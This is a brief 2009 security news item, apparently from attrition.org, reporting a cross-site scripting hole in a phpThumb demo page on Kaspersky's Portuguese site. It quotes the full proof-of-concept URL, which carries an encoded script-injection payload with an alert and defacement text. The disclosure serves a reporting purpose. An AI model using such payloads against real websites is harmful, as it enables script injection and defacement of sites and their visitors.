Kaspersky XSS

6/15/2009

Juha-Matti Laurio

http://linuxbox.org/pipermail/funsec/2009-June/021134.html



Kaspersky has an XSS vulnerability. You can see an archive of it and any status update regarding it being fixed at XSSed.com.

XSS URL provided: http://www.kaspersky.com.pt/base/guest/phpthumb/demo/phpThumb.demo.showpic.php?src=images%2Fsmall.jpg&title=This%2Bis%2Ba%2Bsmall%2Bpicture&fltr[]=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(/XSS%20By%20TurKPoweR%20-%20FROM%20TURKEY/)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%20-%20FROM%20TURKEY%3C/h1%3E%3C/marquee%3E


main page ATTRITION feedback